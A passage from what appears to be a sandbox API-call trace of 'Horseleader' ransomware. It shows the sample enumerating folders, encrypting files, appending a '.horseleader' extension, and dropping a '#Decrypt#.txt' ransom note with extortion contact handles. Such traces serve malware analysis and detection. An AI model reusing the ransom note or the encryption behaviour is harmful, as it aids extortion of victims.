lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0234.453] CloseHandle (hObject=0x158) returned 1 [0234.453] GetProcessHeap () returned 0x780000 [0234.453] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.453] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.horseleader") returned 88 [0234.453] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.horseleader")) returned 1 [0234.454] GetProcessHeap () returned 0x780000 [0234.454] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.454] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad59fd00, ftCreationTime.dwHighDateTime=0x1ca9454, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad59fd00, ftLastWriteTime.dwHighDateTime=0x1ca9454, nFileSizeHigh=0x0, nFileSizeLow=0x665a0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSCDM.DLL", cAlternateFileName="")) returned 0 [0234.454] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0234.455] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\#Decrypt#.txt") returned 80 [0234.455] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0234.455] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.455] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0234.456] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.456] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0234.456] CloseHandle (hObject=0x21c) returned 1 [0234.457] GetProcessHeap () returned 0x780000 [0234.457] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0234.457] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0234.457] lstrcmpiW (lpString1="MSInfo", lpString2="Windows") returned -1 [0234.457] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo") returned 57 [0234.457] lstrcmpW (lpString1="MSInfo", lpString2=".") returned 1 [0234.457] lstrcmpW (lpString1="MSInfo", lpString2="..") returned 1 [0234.457] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.457] GetProcessHeap () returned 0x780000 [0234.457] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0234.457] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*") returned 59 [0234.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0234.457] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.457] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\.") returned 59 [0234.457] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.457] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0234.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.458] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\..") returned 60 [0234.458] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.458] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.458] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0234.458] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0234.458] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US") returned 63 [0234.458] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0234.458] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0234.458] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.458] GetProcessHeap () returned 0x780000 [0234.458] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.458] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*") returned 65 [0234.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.458] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.458] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\.") returned 65 [0234.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.458] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="..", cAlternateFileName="")) returned 1 [0234.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.458] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\..") returned 66 [0234.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.459] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0a09f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xca0a09f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 1 [0234.459] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="Windows") returned -1 [0234.459] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 80 [0234.459] StrStrIW (lpFirst="msinfo32.exe.mui", lpSrch=".horseleader") returned 0x0 [0234.459] lstrcmpW (lpString1="msinfo32.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0234.459] lstrcmpW (lpString1="msinfo32.exe.mui", lpString2="_uninstalling_.png") returned 1 [0234.459] lstrlenW (lpString=".testttjffg") returned 11 [0234.459] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui", lpSrch=".testttjffg") returned 0x0 [0234.459] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.459] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.459] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.460] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0a09f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xca0a09f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 0 [0234.460] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.460] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\#Decrypt#.txt") returned 77 [0234.460] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.465] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.465] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.466] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.466] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.466] CloseHandle (hObject=0x158) returned 1 [0234.466] GetProcessHeap () returned 0x780000 [0234.466] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.466] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830a4e7c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x830a4e7c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x830cafdd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5c800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0234.466] lstrcmpiW (lpString1="msinfo32.exe", lpString2="Windows") returned -1 [0234.466] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 70 [0234.466] StrStrIW (lpFirst="msinfo32.exe", lpSrch=".horseleader") returned 0x0 [0234.467] lstrcmpW (lpString1="msinfo32.exe", lpString2="#Decrypt#.txt") returned 1 [0234.467] lstrcmpW (lpString1="msinfo32.exe", lpString2="_uninstalling_.png") returned 1 [0234.467] lstrlenW (lpString=".testttjffg") returned 11 [0234.467] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe", lpSrch=".testttjffg") returned 0x0 [0234.467] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.467] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.467] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830a4e7c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x830a4e7c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x830cafdd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5c800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msinfo32.exe", cAlternateFileName="")) returned 0 [0234.467] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0234.467] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\#Decrypt#.txt") returned 71 [0234.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0234.468] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.468] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0234.469] lstrlenA 